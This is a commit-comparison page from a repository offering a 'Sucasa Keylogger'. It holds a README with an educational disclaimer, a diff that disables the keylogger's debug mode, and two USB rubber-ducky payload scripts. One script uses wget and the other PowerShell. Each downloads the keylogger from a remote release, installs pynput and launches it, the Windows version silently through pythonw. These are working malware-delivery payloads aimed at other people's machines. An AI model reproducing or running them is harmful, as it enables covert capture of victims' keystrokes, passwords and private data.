Compare commits
5 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
| 31d6cb30aa | |||
| feb0495011 | |||
| 2102377005 | |||
| 06254e9f02 | |||
| d0e3b2cd0d |
@@ -0,0 +1,7 @@
|
||||
# Sucasa Keylogger
|
||||
## These scripts are provided as-is with no guarantee of quality and only for use as educational tools.
|
||||
------
|
||||
As of the moment the script will work about anywhere with python installed but the injector only works on linux distributions with wget or windows systems with powershell available,
|
||||
basic script execution possible, etc.
|
||||
|
||||
Assisted injection method coming soon! (Usb loaded with relevant files + rubber ducky combo for systems incapable of pulling data from remotes and the likes.)
|
||||
@@ -4,7 +4,7 @@ import random
|
||||
import datetime
|
||||
|
||||
dat = "" # Holds all the data from target input
|
||||
dbg = True # Wether or not its on debug mode
|
||||
dbg = False # Wether or not its on debug mode
|
||||
log = True # Wether or not it will generate logs
|
||||
id = 0 # If logs are enabled (default yes) this will hold the ID generated on script start
|
||||
|
||||
|
||||
@@ -0,0 +1,12 @@
|
||||
REM Author: JAM
|
||||
REM Description: Downloads and enables the sucasa keylogger
|
||||
REM Version: 1.0
|
||||
REM Category: Execution
|
||||
STRING wget https://github.com/JessiMcKissick/sucasa-keylogger/releases/download/betas/sucasa.py
|
||||
ENTER
|
||||
DELAY 750
|
||||
STRING pip install pynput
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING python3 sucasa.py
|
||||
ENTER
|
||||
@@ -0,0 +1,29 @@
|
||||
REM Author: JAM
|
||||
REM Description: Downloads and enables the sucasa keylogger on windows
|
||||
REM Version: 1.0
|
||||
REM Category: Execution
|
||||
GUI r
|
||||
DELAY 2000
|
||||
STRING powershell
|
||||
ENTER
|
||||
DELAY 4000
|
||||
STRING $source = "https://github.com/JessiMcKissick/sucasa-keylogger/releases/download/betas/sucasa.py"
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRING $destination = "$env:USERPROFILE\sucasa.py"
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRING $client = new-object System.Net.WebClient
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRING $client.DownloadFile($source,$destination)
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRING pip install pynput
|
||||
ENTER
|
||||
DELAY 3000
|
||||
STRING Start-Process -NoNewWindow pythonw $env:USERPROFILE\sucasa.py
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRING exit
|
||||
ENTER
|
||||
Reference in New Issue
Block a user